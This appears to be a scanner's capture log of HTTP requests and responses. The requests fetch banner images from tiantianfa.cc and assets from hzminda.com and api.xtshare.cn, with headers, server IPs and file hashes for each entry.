Md5:    a5f9a9e27c647dc5fdd7d028e7d4903e
Sha1:   63a01d67b7f5d8c69d3dc36a5f84182961d9d7f3
Sha256: 7dc4f5370a1f296f5e39aa41b26e990ac1678165417c0b0f3a9a06d235e6309f
                                        
                                            GET /images/888-1200x60.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:56 GMT
Content-Length: 27928
Last-Modified: Sun, 21 May 2017 05:20:32 GMT
Connection: keep-alive
Etag: "592123a0-6d18"
Expires: Wed, 16 Aug 2017 12:16:56 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1200 x 60
Size:   27928
Md5:    426f4782efd78064067ce406eb65f7dd
Sha1:   e0a871a95838f07e3d49ce6b8741c4340c8b8910
Sha256: 3acde29425cba86b5ee9a84032749b0ba6aa7a243741de9d57f6d1dafc59228c
                                        
                                            GET /images/vnsirir1000x60.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:52 GMT
Content-Length: 157663
Last-Modified: Thu, 15 Jun 2017 09:31:10 GMT
Connection: keep-alive
Etag: "594253de-267df"
Expires: Wed, 16 Aug 2017 12:16:52 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 60
Size:   157663
Md5:    2ec985b248cede68461826b751e563d1
Sha1:   e4616e10f0a6f045c534c91e75640a19a9f8f0a6
Sha256: 571ecc00c9724850a5f236b7d58b839e8fe5e041bb79f44fdc135557276da7e2
                                        
                                            GET /images/xh-1201x60.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:44 GMT
Content-Length: 270191
Last-Modified: Mon, 05 Jun 2017 06:36:36 GMT
Connection: keep-alive
Etag: "5934fbf4-41f6f"
Expires: Wed, 16 Aug 2017 12:16:44 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1201 x 60
Size:   270191
Md5:    d340905f833c71b5987bf8af3e4d5e7b
Sha1:   a0910614a65d841254aeb60f65a05b582cfa6ebf
Sha256: 4ae0afb7f3c6cb2c93690799f6a1e74953caa5a1ccb0d3232f5ebf7f2f07a1c0
                                        
                                            GET /images/mry1200x70.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:43 GMT
Content-Length: 227631
Last-Modified: Mon, 19 Jun 2017 02:16:51 GMT
Connection: keep-alive
Etag: "59473413-3792f"
Expires: Wed, 16 Aug 2017 12:16:43 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1200 x 90
Size:   227631
Md5:    61f93464a451f55c64d7a95eb0fa17af
Sha1:   b6cd21c69ecc4f8d5a0853364f4d05808db28e32
Sha256: ba40b75cbfd180ebf3f5817a5b66fbfb6d1f5d2b506b249ac3a70689a3b32ff3
                                        
                                            GET /images/nvs9-91000x60.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:59 GMT
Content-Length: 115578
Last-Modified: Mon, 19 Jun 2017 01:19:17 GMT
Connection: keep-alive
Etag: "59472695-1c37a"
Expires: Wed, 16 Aug 2017 12:16:59 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 60
Size:   115578
Md5:    2c5b729ee87301e271d55e3eb1ffe4c8
Sha1:   57c4009cae894f83a863918171deed7ecb8699b7
Sha256: f4782834a7a4a53050392be4c405d5b61329062dc8176e2102c81c80a6120b45
                                        
                                            GET /images/yl889-1000x60.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:55 GMT
Content-Length: 260716
Last-Modified: Thu, 15 Jun 2017 09:59:43 GMT
Connection: keep-alive
Etag: "59425a8f-3fa6c"
Expires: Wed, 16 Aug 2017 12:16:55 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 60
Size:   260716
Md5:    a707984fc5950b33114c81a01b886c48
Sha1:   6ae369a087b0698570557624ed455be20f9ddd23
Sha256: 774047a9e6c025582ee38898f382667df9ea9e5dd2365cc823a26db5a123d436
                                        
                                            GET /images/ylhg-990x50-1.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:17:08 GMT
Content-Length: 24371
Last-Modified: Wed, 28 Jun 2017 09:04:53 GMT
Connection: keep-alive
Etag: "59537135-5f33"
Expires: Wed, 16 Aug 2017 12:17:08 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 990 x 50
Size:   24371
Md5:    ffc1b8487d47bc9b0037a62b3eba81c3
Sha1:   ff2e782bbfce9b28d40d21540455f209d063f114
Sha256: 21ab147ab950b8a3122e7b920b38932fc486079051d7e14c6fe6682aaa0d78c8
                                        
                                            GET /images/pi-990x50-1.jpg HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:17:09 GMT
Content-Length: 32267
Last-Modified: Wed, 28 Jun 2017 09:04:59 GMT
Connection: keep-alive
Etag: "5953713b-7e0b"
Expires: Wed, 16 Aug 2017 12:17:09 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, EXIF standard
Size:   32267
Md5:    bdaba567a67bd3b40b691b8ec16fb5e3
Sha1:   0ae70011f83032f83190f2917d32979deb011848
Sha256: 07507e242d550863f5edf7ef1dd5ed94ea98e3051bccb569e3622389d85266a0
                                        
                                            GET /images/ylhg-990x50-2.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:17:08 GMT
Content-Length: 29076
Last-Modified: Wed, 28 Jun 2017 09:04:56 GMT
Connection: keep-alive
Etag: "59537138-7194"
Expires: Wed, 16 Aug 2017 12:17:08 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 990 x 50
Size:   29076
Md5:    0082c238d1f8586abb45279e4de2f4c4
Sha1:   e0786cd979dbde44bb4d77e16b2c87ba53be36b3
Sha256: 09e85a76fe4d40daa9598d81a33953b89b98afc67e6b667028eca6baef93e472
                                        
                                            GET /images/pi-990x50-2.jpg HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:17:10 GMT
Content-Length: 37256
Last-Modified: Wed, 28 Jun 2017 09:04:49 GMT
Connection: keep-alive
Etag: "59537131-9188"
Expires: Wed, 16 Aug 2017 12:17:10 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, EXIF standard
Size:   37256
Md5:    edff151188fdbd4b254c2dd2ca11856b
Sha1:   01cd9f0e79a31e1dc84ae6b9e896294c46bb29c9
Sha256: e0b1585b5bb5b6c80c14bc366267bbe96790196367a24bbd3adb5ee43db89028
                                        
                                            GET /images/bifa-630x150.jpg HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:17:11 GMT
Content-Length: 40538
Last-Modified: Sat, 01 Apr 2017 06:13:45 GMT
Connection: keep-alive
Etag: "58df4519-9e5a"
Expires: Wed, 16 Aug 2017 12:17:11 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   40538
Md5:    d685edc1cea1d50906362ae6268f05c3
Sha1:   05cefae32e3ff03726bcae07bc10e1d6baffd2e9
Sha256: 2766c03f3b74a6c24cdc3df609ccd603b250869d53e8d3a6bc791db81df8587d
                                        
                                            GET /images/yzc-630x150.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:17:12 GMT
Content-Length: 33097
Last-Modified: Sat, 01 Apr 2017 06:09:21 GMT
Connection: keep-alive
Etag: "58df4411-8149"
Expires: Wed, 16 Aug 2017 12:17:12 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 480 x 160
Size:   33097
Md5:    59cf52e7eb81b745755b4abc72d84372
Sha1:   c859c42399c803df1e3c9143dfed161a0a3537aa
Sha256: 5a1c53d0090a19733c6dc41f20c845b6c5ee4b701138ecefc3692319cbdb5c10
                                        
                                            GET /images/11-1000x60.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:17:10 GMT
Content-Length: 144449
Last-Modified: Wed, 07 Jun 2017 09:00:08 GMT
Connection: keep-alive
Etag: "5937c098-23441"
Expires: Wed, 16 Aug 2017 12:17:10 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 60
Size:   144449
Md5:    bce1f7bbb9cb79ec3bbf7518a160f64a
Sha1:   ba5968fb8e5eec04efdb98d4805e01f3e265c6f0
Sha256: 7292c3609a2c7d2aee79460228b4193002b1bf54c8f32c9e8bcde0295ce52f2d
                                        
                                            GET /images/tyc750x180.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:17:13 GMT
Content-Length: 101534
Last-Modified: Sat, 01 Apr 2017 06:13:48 GMT
Connection: keep-alive
Etag: "58df451c-18c9e"
Expires: Wed, 16 Aug 2017 12:17:13 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 750 x 180
Size:   101534
Md5:    86351dc5276cff7cae6f66547f5346dc
Sha1:   96d90bbf0685dbcfa1cc03e9aead46c621e84474
Sha256: d3212ce8ecf3d731e4cfb0ab8f29a47eb1aebb2d0ffa143cb2ef4591ac6f8e56
                                        
                                            GET /images/sport.png HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:17:16 GMT
Content-Length: 1003
Last-Modified: Mon, 27 Mar 2017 11:08:16 GMT
Connection: keep-alive
Etag: "58d8f2a0-3eb"
Expires: Wed, 16 Aug 2017 12:17:16 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 32 x 32, 8-bit/color RGBA, non-interlaced
Size:   1003
Md5:    d1ec7eef5489fb04736304cbe4e7495e
Sha1:   88ac05d80c6094835f17390cc351eca60d43ba10
Sha256: 2ac0b5cd33b2bd825f13acf8e1542cd9b3bb480685fe07bcd3d79222d2a23301
                                        
                                            GET /images/yd-630x150.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:17:15 GMT
Content-Length: 173647
Last-Modified: Mon, 27 Mar 2017 11:08:16 GMT
Connection: keep-alive
Etag: "58d8f2a0-2a64f"
Expires: Wed, 16 Aug 2017 12:17:15 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 630 x 150
Size:   173647
Md5:    7249f86d543f67e9cca13abec4bdfd73
Sha1:   e7823c0a8c36086b8b1bac61df764722716f722a
Sha256: 57e5a9fd75aeb5b9cbef6e63903130837ed98cec237f33f4179e3d4111faa30f
                                        
                                            GET /images/xpj8-970x60.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:17:02 GMT
Content-Length: 413974
Last-Modified: Wed, 28 Jun 2017 09:31:02 GMT
Connection: keep-alive
Etag: "59537756-65116"
Expires: Wed, 16 Aug 2017 12:17:02 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 970 x 60
Size:   413974
Md5:    bdf876853b5c30c2d624e3f2d35beab2
Sha1:   00e4c71723f91d5209bad6b9e1f9c6db8487c43a
Sha256: 1d8d12700b34680cd2983008319a6c3f05f1bf4fdf49dcca0f2fe338e856a7fb
                                        
                                            GET /images/xpj258-980x70.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:17:03 GMT
Content-Length: 396891
Last-Modified: Wed, 28 Jun 2017 09:31:06 GMT
Connection: keep-alive
Etag: "5953775a-60e5b"
Expires: Wed, 16 Aug 2017 12:17:03 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 980 x 70
Size:   396891
Md5:    f6e6b58c00baca1b042947e99365ace6
Sha1:   4ee9f2af4693fedad63a9442499a0e3afbfc72ff
Sha256: 59d9c6ef2d5ea9c05e1da5deee3cafe6ef2593f14be1303051d57514d31b882b
                                        
                                            GET /images/lhj-1100x60.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:44 GMT
Content-Length: 503303
Last-Modified: Thu, 15 Jun 2017 06:57:54 GMT
Connection: keep-alive
Etag: "59422ff2-7ae07"
Expires: Wed, 16 Aug 2017 12:16:44 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1100 x 60
Size:   503303
Md5:    3d497a5402c6f3352e401dc52939dd06
Sha1:   0b535f3a6e25251366867c9a55fc1fa5ae866dad
Sha256: c43217cc1634a474c49ec417602dc04e9a4f2d12db4a8d62945fd5b863f7c784
                                        
                                            GET /images/yl-1200x60.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:17:08 GMT
Content-Length: 301226
Last-Modified: Wed, 28 Jun 2017 09:31:08 GMT
Connection: keep-alive
Etag: "5953775c-498aa"
Expires: Wed, 16 Aug 2017 12:17:08 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1200 x 60
Size:   301226
Md5:    e4a9124618948fc4cfe36aa7d78642bc
Sha1:   ab5198efb76c2779088373259f3742066b13640a
Sha256: 880a7bc796c1772bc55e0a0b9f7b05015afac0a3cc1f6a7e12176ffa19a83c4e
                                        
                                            GET /images/yzc300x150.gif HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:17:16 GMT
Content-Length: 164714
Last-Modified: Tue, 10 Jan 2017 08:55:20 GMT
Connection: keep-alive
Etag: "5874a178-2836a"
Expires: Wed, 16 Aug 2017 12:17:16 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 300 x 150
Size:   164714
Md5:    7fbf5be7df902da8ef15c8cf4fa56d3a
Sha1:   4524f433afa5d9d660a923e830df3b2815094e5f
Sha256: 9258be77464402ed27aa06cd4cb785e6624c6e1c1bccea0ba265673dd0e1a75d
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: text/html;Charset=utf-8
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:15:57 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.41
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   8384
Md5:    249abe269bfd893008182e50fe3144bc
Sha1:   22fa8d1835d7ec2590fa68d712243ed30abc2c2c
Sha256: a079780e37cfd420d65098b1e9428f961d5702922a521aa054d010a35b4cecab
                                        
                                            GET /tpapi.php?pic=http://pic1.qiyipic.com/image/20160706/34/2f/a_50005579_m_601_m1_180_236.jpg HTTP/1.1 
Host: api.xtshare.cn
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html

                                         
                                         0.0.0.0
                                        


--- Additional Info ---
                                        
                                            GET /tpapi.php?pic=http://pic8.qiyipic.com/image/20161013/03/c6/a_100034194_m_601_180_236.jpg HTTP/1.1 
Host: api.xtshare.cn
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html

                                         
                                         0.0.0.0
                                        


--- Additional Info ---
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: text/html;Charset=utf-8
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:15:54 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.41
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip


--- Additional Info ---